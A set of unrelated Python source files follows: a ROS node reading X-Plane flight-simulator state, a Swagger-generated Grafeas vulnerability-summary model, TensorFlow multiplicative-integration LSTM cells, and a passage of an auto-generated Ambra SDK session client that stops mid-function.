from geometry_msgs.msg import Pose, PoseStamped
from nav_msgs.msg import Odometry
from std_msgs.msg import Float32
from geometry_msgs.msg import Quaternion
from tf.transformations import quaternion_from_euler
import numpy as np
KNOTS_TO_MS = 0.51444444444
MS_TO_FPM = 60.0/0.305
angle_in_deg = True
'''Class to extract position and controls related information from XPlane '''
class StateReader:
def __init__(self, client):
'''instantiate connection to XPC'''
#self.client = xpc.XPlaneConnect()
self.client = client
self.initPose = Pose()
self.initPose.position.x = None
self.initPose.position.y = None
self.initPose.position.z = None
# Publish global state consisting of GlobalState msg (Latitutde Longitude instead of openGL coordinates)
self.globalStatePub = rospy.Publisher("/xplane/flightmodel/global_state", xplane_msgs.GlobalState, queue_size = 10)
self.odomPub = rospy.Publisher("/xplane/flightmodel/odom", Odometry, queue_size=10) # Odometry is also being provided in the NED format : XYZ <-> NED
# self.posePub = rospy.Publisher("/xplane/flightmodel/pose", Pose, queue_size=10)
# self.velPub = rospy.Publisher("/xplane/flightmodel/velocity", Twist, queue_size=10)
'''Publisher for data in rosplane format'''
self.statePub = rospy.Publisher("/fixedwing/xplane/state", rosplane_msgs.State, queue_size=10)
# self.diff_pub = rospy.Publisher("/xplane/height_diff", Float32, queue_size=10 )
self.transformPub = rospy.Publisher("/xplane/flightmodel/my_transform", xplane_msgs.TransformedPoint, queue_size=10)
self.odom = Odometry()
def sensor_update(self):
# get global position information from XPlane
pos = self.client.getPOSI()
# convert data to ros msgs
msg = xplane_msgs.Position()
msg.lat = pos[0]
msg.lon = pos[1]
msg.el = pos[2]
msg.roll = pos[3]
msg.pitch = pos[4]
msg.heading = pos[5]
msg.gear = pos[6]
self.posePub.publish(msg)
def control_update(self):
# get control surfaces information from XPlane
ctrl = self.client.getCTRL()
# convert data to ros msgs
msg = xplane_msgs.Controls()
msg.elevator = ctrl[0]
msg.aileron = ctrl[1]
msg.rudder = ctrl[2]
msg.throttle = ctrl[3]
msg.gear = ctrl[4]
msg.flaps = ctrl[5]
msg.speed_brakes = ctrl[6]
self.controlPub.publish(msg)
def sensor_update2(self):
drefs = []
''' Get sim time to generate timestamp and header for ROS msgs '''
drefs.append("sim/time/total_running_time_sec")
'''Global latitude (1), longitude(2) and elevation(3) datarefs'''
drefs.append("sim/flightmodel/position/latitude")
drefs.append("sim/flightmodel/position/longitude")
drefs.append("sim/flightmodel/position/elevation")
'''Position in local coordinates x(4), y(5), z(6)'''
drefs.append("sim/flightmodel/position/local_x")
drefs.append("sim/flightmodel/position/local_y")
drefs.append("sim/flightmodel/position/local_z")
'''Velocity in local coordinates vx(7), vy(8), vz(9)'''
drefs.append("sim/flightmodel/position/local_vx")
drefs.append("sim/flightmodel/position/local_vy")
drefs.append("sim/flightmodel/position/local_vz")
''' attitude information roll(10), pitch(11), yaw(12)'''
drefs.append("sim/flightmodel/position/phi")
drefs.append("sim/flightmodel/position/theta")
drefs.append("sim/flightmodel/position/psi")
'''Control surface information pitch(13), roll(14), yaw(15), throttle(16), flaps(17), speed brakes(18)'''
drefs.append("sim/joystick/yoke_pitch_ratio")
drefs.append("sim/joystick/yoke_roll_ratio")
drefs.append("sim/joystick/yoke_heading_ratio")
drefs.append("sim/flightmodel/engine/ENGN_thro")
drefs.append("sim/flightmodel/controls/flaprat")
drefs.append("sim/flightmodel/controls/sbrkrat")
''' rotation rate pitch(19), roll(20), yaw(21)'''
drefs.append("sim/flightmodel/position/Q")
drefs.append("sim/flightmodel/position/P")
drefs.append("sim/flightmodel/position/R")
''' Gear (22) '''
drefs.append("sim/aircraft/parts/acf_gear_deploy")
''' Quaternion (23)'''
drefs.append("sim/flightmodel/position/q")
''' alpha (24), beta(25) '''
drefs.append("sim/flightmodel/position/alpha")
drefs.append("sim/flightmodel/position/beta")
'''Wind speed (26) and x(27), y(28),z (29) components in openGL'''
drefs.append("sim/weather/wind_speed_kt")
drefs.append("sim/weather/wind_now_x_msc")
drefs.append("sim/weather/wind_now_y_msc")
drefs.append("sim/weather/wind_now_z_msc")
'''Airspeed (30) and groundspeed (31) '''
drefs.append("sim/flightmodel/position/indicated_airspeed")
drefs.append("sim/flightmodel/position/groundspeed")
''' Reference latitude(32) and longitude(33) '''
drefs.append("sim/flightmodel/position/lat_ref")
drefs.append("sim/flightmodel/position/lon_ref")
''' vertical velocity (34) '''
drefs.append("sim/flightmodel/position/vh_ind")
data = self.client.getDREFs(drefs)
'''For indices refer above where we append the datarefs'''
#print(data[8][0], data[34][0])
#print(data[34][0])
'''Set initial position so that this vector can be subtracted from subsequent local positions (Centre the frame)'''
if (not self.initPose.position.x):
self.initPose.position.x = data[4][0]
self.initPose.position.y = data[5][0]
self.initPose.position.z = data[6][0]
self.opengl_point_to_ned(self.initPose)
self.global_state = xplane_msgs.GlobalState() # Global coordinate information
'''Additional 0 index because the data is in the form of a tuple'''
self.global_state.latitude = data[1][0]
self.global_state.longitude = data[2][0]
self.global_state.elevation = data[3][0]
self.global_state.roll = data[10][0]
self.global_state.pitch = data[11][0]
self.global_state.heading = data[12][0]
self.global_state.gear = data[22][0]
pose = Pose() # position in local coordinates
velocity = Twist() # velocity in local coordinates
odom = Odometry()
'''pose and orientation in openGL coordinates. However, the angle convention is still NED so no change required there'''
pose.position.x = data[4][0]
pose.position.y = data[5][0]
pose.position.z = data[6][0]
pose.orientation.x = data[23][1]
pose.orientation.y = data[23][2]
pose.orientation.z = data[23][3]
pose.orientation.w = data[23][0]
''' Quaternion test '''
# q = quaternion_from_euler(self.global_state.roll * np.pi/180.0, self.global_state.pitch * np.pi/180.0, self.global_state.heading * np.pi/180.0)
# print(q)
# print(pose.orientation)
# print("-----------------------")
''' Current data seems good '''
''' Convert openGL (East Up South) to NED frame & apply translation'''
self.opengl_point_to_ned(pose)
self.shift_point(pose, self.initPose)
'''Although linear velocities must be transformed but it seems like XPlane provides Attitude rates according to conventional NED format'''
velocity.linear.x = data[7][0] # pn_dot
velocity.linear.y = data[8][0] # pe_dot
velocity.linear.z = data[9][0] # pd_dot
velocity.angular.x = data[20][0] # Roll rate
velocity.angular.y = data[19][0] # Pitch rate
velocity.angular.z = data[21][0] # Yaw rate
self.opengl_velocity_to_ned(velocity)
odom.header.frame_id = '/world'
'''TODO : In order to be able to plot on rqt with other data, we should instead use Time.now()'''
odom.header.stamp = rospy.Time(secs=data[0][0])
odom.pose.pose = pose
odom.twist.twist = velocity
self.odom = odom
''' rosplane state '''
state = rosplane_msgs.State()
state = self.get_rosplane_state(data)
# state.header.stamp = rospy.Time(secs=data[0][0])
state.header.stamp = rospy.Time.now()
# state.header.frame_id = "\x01"
state.header.frame_id = "world"
# state.initial_alt = 0.0
# state.initial_lat = 0.0
# state.initial_lon = 0.0
# state.quat_valid = False
# state.quat = [1.0, 0.0, 0.0, 0.0]
# state.chi_deg = 0.0
# state.psi_deg = 0.0
'''Print statements to check if local_vy can be used as vertical velocity indicator
vh_ms = self.client.getDREF("sim/flightmodel/position/vh_ind")[0]
vh_fpm = self.client.getDREF("sim/flightmodel/position/vh_ind_fpm")[0]
print("sensor : %f, %f, %f" % (vh_ms, -velocity.linear.z, vh_fpm*0.3048/60))'''
self.globalStatePub.publish(self.global_state)
self.odomPub.publish(odom)
# self.posePub.publish(pose)
# self.velPub.publish(velocity)
self.statePub.publish(state)
# self.diff_pub.publish(data[5][0] - data[3][0])
'''TODO : local_vx, vy, vz don't seem to give a magnitude equal to airspeed. It could be Vg instead ; investigate this'''
def get_rosplane_state(self, data):
state = rosplane_msgs.State()
state.position[0] = -data[6][0] - self.initPose.position.x
state.position[1] = data[4][0] - self.initPose.position.y
state.position[2] = -data[5][0] - self.initPose.position.z
state.Va = data[30][0] * KNOTS_TO_MS # dataref gives airspeed in knots; need to convert it to m/s
'''Sending angle values in degrees or in rad'''
if angle_in_deg:
state.alpha = data[24][0]
state.beta = data[25][0]
state.phi = data[10][0]
state.theta = data[11][0]
state.psi = data[12][0]
else:
state.alpha = data[24][0] * (np.pi / 180.0)
state.beta = data[25][0] * (np.pi / 180.0)
state.phi = data[10][0] * (np.pi/180)
state.theta = data[11][0] * (np.pi/180)
state.psi = data[12][0] * (np.pi/180)
state.p = data[20][0] * (np.pi/180) # roll rate in rad/s
state.q = data[19][0] * (np.pi/180) # pitch rate in rad/s
state.r = data[21][0] * (np.pi/180) # yaw rate in rad/s
state.Vg = data[31][0] # dataref gives groundspeed in m/s
wind_speed = data[26][0]
'''wn = w * -z_component
we = w * x_component '''
state.wn = wind_speed * (-data[29][0])
state.we = wind_speed * (data[27][0])
# state.wn = 0
# state.we = 0
state.vh = data[8][0] * MS_TO_FPM
'''Print statements to see if speed is in m/s or knots'''
# vx = self.odom.twist.twist.linear.x
# vy = self.odom.twist.twist.linear.y
# vz = self.odom.twist.twist.linear.z
# print("Airspeed Xplane : %f" % (state.Va))
# print("Airpspeed in m/s %f" % (state.Va * 0.51444444444 ))
# print("Self Airspeed : %f" % (np.sqrt(vx*vx + vy*vy + vz*vz)))
# print("Ground velocity : %f" % (state.Vg))
# print("Ground velocity in m/s : %f" % (state.Vg * 0.51444444444 ))
# print("self Groundspeed : %f" % (np.sqrt(vx*vx + vy*vy)))
# print("-------------------------------------")
'''Observations :
groundspeed dataref in fact gives groundspeed in m/s.
But airspeed is in knots.
sqrt(vx*vx + vy*vy + vz*vz) = groundspeed (should've been equal to airspeed)
airspeed seems slightly off from sqrt(vx*vx + vy*vy + vz*vz) probably because of wind
'''
state.chi = state.psi + state.beta # TODO : calculate course angle ; currently assume wind velocity is 0
if angle_in_deg:
if state.chi > 180.0:
state.chi = state.chi - 2*180.0
if state.chi < -180.0:
state.chi = state.chi + 2*180.0
'''Wrap the course angle between -PI and PI'''
if state.psi > 180.0:
state.psi -= 2*180.0
if state.psi < -180.0:
state.psi += 2*180.0
else:
if state.chi > np.pi:
state.chi = state.chi - 2*np.pi
if state.chi < -np.pi:
state.chi = state.chi + 2*np.pi
'''Wrap the course angle between -PI and PI'''
if state.psi > np.pi:
state.psi -= 2*np.pi
if state.psi < -np.pi:
state.psi += 2*np.pi
return state
def opengl_point_to_ned(self, pose):
''' [pn,pe,pd]^T = [0, 0, -1] [x,y,z]^T
[1, 0, 0 ]
[0, -1, 0] '''
pn = -pose.position.z
pe = pose.position.x
pd = -pose.position.y
pose.position.x = pn
pose.position.y = pe
pose.position.z = pd
def opengl_velocity_to_ned(self, vel):
''' [pn,pe,pd]^T = [0, 0, -1] [x,y,z]^T
[1, 0, 0 ]
[0, -1, 0] '''
pn_dot = -vel.linear.z
pe_dot = vel.linear.x
pd_dot = -vel.linear.y
vel.linear.x = pn_dot
vel.linear.y = pe_dot
vel.linear.z = pd_dot
def shift_point(self, pose, init):
pose.position.x = (pose.position.x - init.position.x)
pose.position.y = (pose.position.y - init.position.y)
pose.position.z = (pose.position.z - init.position.z)
| StarcoderdataPython |
1763626 | <filename>grafeas/models/vulnerability_occurrences_summary_fixable_total_by_digest.py
# coding: utf-8
"""
grafeas.proto
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1beta1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class VulnerabilityOccurrencesSummaryFixableTotalByDigest(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'resource': 'V1beta1Resource',
'severity': 'VulnerabilitySeverity',
'fixable_count': 'str',
'total_count': 'str'
}
attribute_map = {
'resource': 'resource',
'severity': 'severity',
'fixable_count': 'fixableCount',
'total_count': 'totalCount'
}
def __init__(self, resource=None, severity=None, fixable_count=None, total_count=None): # noqa: E501
"""VulnerabilityOccurrencesSummaryFixableTotalByDigest - a model defined in Swagger""" # noqa: E501
self._resource = None
self._severity = None
self._fixable_count = None
self._total_count = None
self.discriminator = None
if resource is not None:
self.resource = resource
if severity is not None:
self.severity = severity
if fixable_count is not None:
self.fixable_count = fixable_count
if total_count is not None:
self.total_count = total_count
@property
def resource(self):
"""Gets the resource of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
The affected resource. # noqa: E501
:return: The resource of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:rtype: V1beta1Resource
"""
return self._resource
@resource.setter
def resource(self, resource):
"""Sets the resource of this VulnerabilityOccurrencesSummaryFixableTotalByDigest.
The affected resource. # noqa: E501
:param resource: The resource of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:type: V1beta1Resource
"""
self._resource = resource
@property
def severity(self):
"""Gets the severity of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
The severity for this count. SEVERITY_UNSPECIFIED indicates total across all severities. # noqa: E501
:return: The severity of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:rtype: VulnerabilitySeverity
"""
return self._severity
@severity.setter
def severity(self, severity):
"""Sets the severity of this VulnerabilityOccurrencesSummaryFixableTotalByDigest.
The severity for this count. SEVERITY_UNSPECIFIED indicates total across all severities. # noqa: E501
:param severity: The severity of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:type: VulnerabilitySeverity
"""
self._severity = severity
@property
def fixable_count(self):
"""Gets the fixable_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
The number of fixable vulnerabilities associated with this resource. # noqa: E501
:return: The fixable_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:rtype: str
"""
return self._fixable_count
@fixable_count.setter
def fixable_count(self, fixable_count):
"""Sets the fixable_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest.
The number of fixable vulnerabilities associated with this resource. # noqa: E501
:param fixable_count: The fixable_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:type: str
"""
self._fixable_count = fixable_count
@property
def total_count(self):
"""Gets the total_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
The total number of vulnerabilities associated with this resource. # noqa: E501
:return: The total_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:rtype: str
"""
return self._total_count
@total_count.setter
def total_count(self, total_count):
"""Sets the total_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest.
The total number of vulnerabilities associated with this resource. # noqa: E501
:param total_count: The total_count of this VulnerabilityOccurrencesSummaryFixableTotalByDigest. # noqa: E501
:type: str
"""
self._total_count = total_count
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(VulnerabilityOccurrencesSummaryFixableTotalByDigest, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, VulnerabilityOccurrencesSummaryFixableTotalByDigest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
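# Illustrative usage sketch (hypothetical values, not part of the generated module):
#
#   summary = VulnerabilityOccurrencesSummaryFixableTotalByDigest(
#       severity='HIGH', fixable_count='3', total_count='10')
#   summary.to_dict()  # -> {'resource': None, 'severity': 'HIGH', 'fixable_count': '3', 'total_count': '10'}
#
# Note that the counts are serialized as strings, mirroring the swagger_types declared above.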
| StarcoderdataPython |
3344891 | import tensorflow as tf
from gcg.tf.layers.fullyconnectednn.fully_connected import FullyConnected
##################
### Operations ###
##################
def linear(args, output_size, dtype=tf.float32, scope=None, trainable=True):
with tf.variable_scope(scope or "linear"):
if isinstance(args, list) or isinstance(args, tuple):
if len(args) != 1:
inputs = tf.concat(args, axis=1)
else:
inputs = args[0]
else:
inputs = args
args = [args]
total_arg_size = 0
shapes = [a.get_shape() for a in args]
for shape in shapes:
if shape.ndims != 2:
raise ValueError("linear is expecting 2D arguments: %s" % shapes)
else:
total_arg_size += shape[1].value
dtype = args[0].dtype
weights = tf.get_variable(
"weights",
[total_arg_size, output_size],
dtype=dtype,
initializer=tf.contrib.layers.xavier_initializer(dtype=dtype),
trainable=trainable
)
output = tf.matmul(inputs, weights)
return output
def multiplicative_integration(
list_of_inputs,
output_size,
initial_bias_value=0.0,
weights_already_calculated=False,
reg_collection=None,
dtype=tf.float32,
scope=None,
trainable=True):
'''
expects a list of 2 inputs and will perform multiplicative integration
weights_already_calculated will treat the list of inputs as Wx and Uz and is useful for batch normed inputs
'''
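# What this computes (see final_output below): alpha * (Wx * Uz) + beta1 * Uz + beta2 * Wx + bias,
# i.e. an element-wise ("multiplicative integration") blend of the two linear terms instead of a plain sum.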
with tf.variable_scope(scope or 'double_inputs_multiple_integration'):
if len(list_of_inputs) != 2: raise ValueError('list of inputs must be 2, you have:', len(list_of_inputs))
assert (weights_already_calculated) # TODO
if weights_already_calculated: # if you already have weights you want to insert from batch norm
Wx = list_of_inputs[0]
Uz = list_of_inputs[1]
else:
Wx = linear(
list_of_inputs[0],
output_size,
dtype=dtype,
reg_collection=reg_collection,
scope="Calculate_Wx_mulint",
trainable=trainable
)
Uz = linear(
list_of_inputs[1],
output_size,
dtype=dtype,
reg_collection=reg_collection,
scope="Calculate_Uz_mulint",
trainable=trainable
)
with tf.variable_scope("multiplicative_integration"):
alpha = tf.get_variable(
'mulint_alpha',
[output_size],
dtype=dtype,
initializer=tf.truncated_normal_initializer(
mean=1.0,
stddev=0.1,
dtype=dtype),
trainable=trainable)
beta1, beta2 = tf.split(
tf.get_variable(
'mulint_params_betas',
[output_size * 2],
dtype=dtype,
initializer=tf.truncated_normal_initializer(
mean=0.5,
stddev=0.1,
dtype=dtype),
trainable=trainable),
2,
axis=0)
original_bias = tf.get_variable(
'mulint_original_bias',
[output_size],
dtype=dtype,
initializer=tf.truncated_normal_initializer(
mean=initial_bias_value,
stddev=0.1,
dtype=dtype),
trainable=trainable)
final_output = alpha * Wx * Uz + beta1 * Uz + beta2 * Wx + original_bias
return final_output
def layer_norm(
inputs,
center=True,
scale=True,
reuse=None,
trainable=True,
epsilon=1e-4,
scope=None):
# TODO
# Assumes that inputs is 2D
# add to collections in order to do l2 norm
with tf.variable_scope(
scope,
default_name='LayerNorm',
reuse=reuse):
shape = tf.shape(inputs)
param_shape = (inputs.get_shape()[1],)
dtype = inputs.dtype.base_dtype
beta = tf.zeros((shape[0],))
gamma = tf.ones((shape[0],))
# beta = tf.get_variable(
# 'beta',
# shape=param_shape,
# dtype=dtype,
# initializer=tf.zeros_initializer(),
# trainable=trainable and center)
# gamma = tf.get_variable(
# 'gamma',
# shape=param_shape,
# dtype=dtype,
# initializer=tf.ones_initializer(),
# trainable=trainable and scale)
inputs_T = tf.transpose(inputs)
inputs_T_reshaped = tf.reshape(inputs_T, (shape[1], shape[0], 1, 1))
outputs_T_reshaped, _, _ = tf.nn.fused_batch_norm(
inputs_T_reshaped,
scale=gamma,
offset=beta,
is_training=True,
epsilon=epsilon,
data_format='NCHW')
outputs_reshaped = tf.transpose(outputs_T_reshaped, (1, 0, 2, 3))
outputs = tf.reshape(outputs_reshaped, shape)
return outputs
#############
### Cells ###
#############
class DpRNNCell(tf.nn.rnn_cell.BasicRNNCell):
def __init__(
self,
num_units,
dropout_mask=None,
activation=tf.tanh,
dtype=tf.float32,
num_inputs=None,
weights_scope=None,
trainable=True):
raise NotImplementedError
self._num_units = num_units
self._dropout_mask = dropout_mask
self._activation = activation
self._dtype = dtype
with tf.variable_scope(weights_scope or type(self).__name__):
self._weights = tf.get_variable(
"weights",
[num_inputs + num_units, num_units],
dtype=dtype,
initializer=tf.contrib.layers.xavier_initializer(dtype=dtype),
regularizer=tf.contrib.layers.l2_regularizer(0.5),
trainable=trainable
)
def __call__(
self,
inputs,
state,
scope=None):
"""Most basic RNN: output = new_state = tanh(W * input + U * state + B). With same dropout at every time step."""
with tf.variable_scope(scope or type(self).__name__): # "BasicRNNCell"
ins = tf.concat([inputs, state], axis=1)
output = self._activation(tf.matmul(ins, self._weights))
if self._dropout_mask is not None:
output = output * self._dropout_mask
return output, output
class DpMulintRNNCell(DpRNNCell):
def __init__(
self,
num_units,
dropout_mask=None,
activation=tf.tanh,
dtype=tf.float32,
num_inputs=None,
use_layer_norm=False,
weights_scope=None,
trainable=True):
raise NotImplementedError
self._num_units = num_units
self._dropout_mask = dropout_mask
self._activation = activation
self._dtype = dtype
self._use_layer_norm = use_layer_norm
self._trainable = trainable
with tf.variable_scope(weights_scope or type(self).__name__):
self._weights_W = tf.get_variable(
"weights_W",
[num_inputs, num_units],
dtype=dtype,
initializer=tf.contrib.layers.xavier_initializer(dtype=dtype),
regularizer=tf.contrib.layers.l2_regularizer(0.5),
trainable=trainable
)
self._weights_U = tf.get_variable(
"weights_U",
[num_units, num_units],
dtype=dtype,
initializer=tf.contrib.layers.xavier_initializer(dtype=dtype),
regularizer=tf.contrib.layers.l2_regularizer(0.5),
trainable=trainable
)
def __call__(
self,
inputs,
state,
scope=None):
"""Multiplicative-integration RNN: output = new_state = tanh(mulint(W * input, U * state)), with the same dropout mask at every time step."""
with tf.variable_scope(scope or type(self).__name__): # "BasicRNNCell"
Wx = tf.matmul(inputs, self._weights_W)
Uz = tf.matmul(state, self._weights_U)
if self._use_layer_norm:
Wx = tf.contrib.layers.layer_norm(
Wx,
center=False,
scale=False)
Uz = tf.contrib.layers.layer_norm(
Uz,
center=False,
scale=False)
output = self._activation(
multiplicative_integration(
[Wx, Uz],
self._num_units,
dtype=self._dtype,
weights_already_calculated=True,
trainable=self._trainable))
if self._dropout_mask is not None:
output = output * self._dropout_mask
return output, output
class DpLSTMCell(tf.nn.rnn_cell.BasicLSTMCell):
def __init__(
self,
num_units,
forget_bias=1.0,
dropout_mask=None,
activation=tf.tanh,
dtype=tf.float32,
num_inputs=None,
weights_scope=None,
trainable=True):
raise NotImplementedError
self._num_units = num_units
self._forget_bias = forget_bias
self._dropout_mask = dropout_mask
self._activation = activation
self._dtype = dtype
self._state_is_tuple = True
with tf.variable_scope(weights_scope or type(self).__name__):
self._weights = tf.get_variable(
"weights",
[num_inputs + num_units, 4 * num_units],
dtype=dtype,
initializer=tf.contrib.layers.xavier_initializer(dtype=dtype),
regularizer=tf.contrib.layers.l2_regularizer(0.5),
trainable=trainable
)
def __call__(
self,
inputs,
state,
scope=None):
"""Most basic LSTM with same dropout at every time step."""
with tf.variable_scope(scope or type(self).__name__): # "BasicRNNCell"
c, h = state
ins = tf.concat([inputs, h], axis=1)
output = self._activation(tf.matmul(ins, self._weights))
i, j, f, o = tf.split(output, 4, axis=1)
forget = c * tf.nn.sigmoid(f + self._forget_bias)
new = tf.nn.sigmoid(i) * self._activation(j)
new_c = forget + new
# TODO make sure this is correct
if self._dropout_mask is not None:
new_c = new_c * self._dropout_mask
new_h = self._activation(new_c) * tf.nn.sigmoid(o)
new_state = tf.nn.rnn_cell.LSTMStateTuple(new_c, new_h)
return new_h, new_state
class DpMulintLSTMCell(DpLSTMCell):
def __init__(
self,
num_units,
forget_bias=1.0,
activation=tf.tanh,
dtype=tf.float32,
num_inputs=None,
use_layer_norm=False,
weights_scope=None,
trainable=True,
layer_class=FullyConnected,
layer_args={},
**kwargs):
assert (num_inputs is not None)
self._num_units = num_units
self._forget_bias = forget_bias
self._activation = activation
self._dtype = dtype
self._use_layer_norm = use_layer_norm
self._state_is_tuple = True
self._trainable = trainable
self._concrete_dropout_layer = None
with tf.variable_scope(weights_scope or type(self).__name__):
with tf.variable_scope('W'):
self._W_layer_call_func = layer_class(
num_inputs=num_inputs,
num_outputs=4*num_units,
biases_initializer=None,
trainable=trainable,
**layer_args
)
with tf.variable_scope('U'):
self._U_layer_call_func = layer_class(
num_inputs=num_units,
num_outputs=4 * num_units,
biases_initializer=None,
trainable=trainable,
**layer_args
)
def __call__(
self,
inputs,
state,
scope=None):
"""Most basic RNN: output = new_state = tanh(W * input + U * state + B)."""
with tf.variable_scope(scope or type(self).__name__): # "BasicRNNCell"
c, h = state
Wx = self._W_layer_call_func(inputs)
Uz = self._U_layer_call_func(h)
if self._use_layer_norm:
Wx = tf.contrib.layers.layer_norm(
Wx,
center=False,
scale=False)
Uz = tf.contrib.layers.layer_norm(
Uz,
center=False,
scale=False)
output = self._activation(
multiplicative_integration(
[Wx, Uz],
4 * self._num_units,
dtype=self._dtype,
weights_already_calculated=True,
trainable=self._trainable))
i, j, f, o = tf.split(output, 4, axis=1)
forget = c * tf.nn.sigmoid(f + self._forget_bias)
new = tf.nn.sigmoid(i) * self._activation(j)
new_c = forget + new
if self._concrete_dropout_layer is not None:
new_c = self._concrete_dropout_layer.apply_soft_dropout_mask(new_c)
if self._use_layer_norm:
norm_c = tf.contrib.layers.layer_norm(
new_c,
center=True,
scale=True)
new_h = self._activation(norm_c) * tf.nn.sigmoid(o)
else:
new_h = self._activation(new_c) * tf.nn.sigmoid(o)
new_state = tf.nn.rnn_cell.LSTMStateTuple(new_c, new_h)
return new_h, new_state
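# Usage sketch (illustrative only): assumes TensorFlow 1.x and that
# `FullyConnected` / `multiplicative_integration` are the helpers defined
# earlier in this module; the sizes below and the `inputs` tensor
# (shape [batch, time, 32]) are example values, not from the original code.
# cell = DpMulintLSTMCell(num_units=64, num_inputs=32, use_layer_norm=True)
# outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32)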
| StarcoderdataPython |
51336 | <reponame>agolovkina/sdk-python<filename>ambra_sdk/service/entrypoints/generated/session.py
""" Session.
Do not edit this file by hand.
This is generated by parsing api.html service doc.
"""
from ambra_sdk.exceptions.service import AuthFailed
from ambra_sdk.exceptions.service import BadPassword
from ambra_sdk.exceptions.service import Blocked
from ambra_sdk.exceptions.service import BrandNotAllowed
from ambra_sdk.exceptions.service import Disabled
from ambra_sdk.exceptions.service import Expired
from ambra_sdk.exceptions.service import InvalidCode
from ambra_sdk.exceptions.service import InvalidCredentials
from ambra_sdk.exceptions.service import InvalidPin
from ambra_sdk.exceptions.service import InvalidSid
from ambra_sdk.exceptions.service import InvalidSignature
from ambra_sdk.exceptions.service import InvalidUrl
from ambra_sdk.exceptions.service import InvalidVendor
from ambra_sdk.exceptions.service import Lockout
from ambra_sdk.exceptions.service import MissingFields
from ambra_sdk.exceptions.service import MissingInformation
from ambra_sdk.exceptions.service import NoOauth
from ambra_sdk.exceptions.service import NotFound
from ambra_sdk.exceptions.service import OnlyOne
from ambra_sdk.exceptions.service import OtherOauth
from ambra_sdk.exceptions.service import PasswordReset
from ambra_sdk.exceptions.service import PinExpired
from ambra_sdk.exceptions.service import SsoOnly
from ambra_sdk.exceptions.service import ValidationFailed
from ambra_sdk.exceptions.service import WhitelistLockout
from ambra_sdk.service.query import QueryO
class Session:
"""Session."""
def __init__(self, api):
self._api = api
def login(
self,
login,
account_login=None,
account_name=None,
email=None,
location=None,
        new_password=None,
        password=None,
use_pkey=None,
validate_session=None,
vanity=None,
):
"""Login.
:param login: The user account_login or email address
:param account_login: account_login
:param account_name: account_name
:param email: email
:param location: Login location. (optional)
:param new_password: Change the password or account password to this. (optional)
:param password: password
:param use_pkey: use_pkey
:param validate_session: If you would like to validate an existing session rather than create a new one pass in the sid of the session to valid in this parameter. It will check if the session is still valid and the credentials are for the session. (optional)
:param vanity: The account vanity name. (optional)
"""
request_data = {
'account_login': account_login,
'account_name': account_name,
'email': email,
'location': location,
'login': login,
            'new_password': new_password,
'password': password,
'use_pkey': use_pkey,
'validate_session': validate_session,
'vanity': vanity,
}
errors_mapping = {}
errors_mapping[('BAD_PASSWORD', None)] = BadPassword('The new_password does not meet the password requirements')
errors_mapping[('BLOCKED', None)] = Blocked('The user is blocked from the system')
errors_mapping[('BRAND_NOT_ALLOWED', None)] = BrandNotAllowed('The user is limited to some brands to login with allowed_login_brands setting')
errors_mapping[('DISABLED', None)] = Disabled('The user is disabled and needs to be /user/enabled to allow access')
errors_mapping[('INVALID_CREDENTIALS', None)] = InvalidCredentials('Invalid user name or password.')
errors_mapping[('LOCKOUT', None)] = Lockout('Too many failed attempts')
        errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds an array of all the missing fields')
errors_mapping[('ONLY_ONE', None)] = OnlyOne('You can pass either the password or use_pkey flag, not both')
errors_mapping[('PASSWORD_RESET', None)] = PasswordReset('The password needs to be changed')
errors_mapping[('SSO_ONLY', None)] = SsoOnly('The user can only login via SSO')
errors_mapping[('VALIDATION_FAILED', None)] = ValidationFailed('The session validation failed')
errors_mapping[('WHITELIST_LOCKOUT', None)] = WhitelistLockout('Login blocked by the account whitelist')
query_data = {
'api': self._api,
'url': '/session/login',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': False,
}
return QueryO(**query_data)
def user(
self,
settings=None,
):
"""User.
:param settings: A JSON list of user settings set via /setting/set to return (optional)
"""
request_data = {
'settings': settings,
}
errors_mapping = {}
query_data = {
'api': self._api,
'url': '/session/user',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def permissions(
self,
account_id=None,
namespace_id=None,
):
"""Permissions.
:param account_id: account_id
:param namespace_id: namespace_id
"""
request_data = {
'account_id': account_id,
'namespace_id': namespace_id,
}
errors_mapping = {}
query_data = {
'api': self._api,
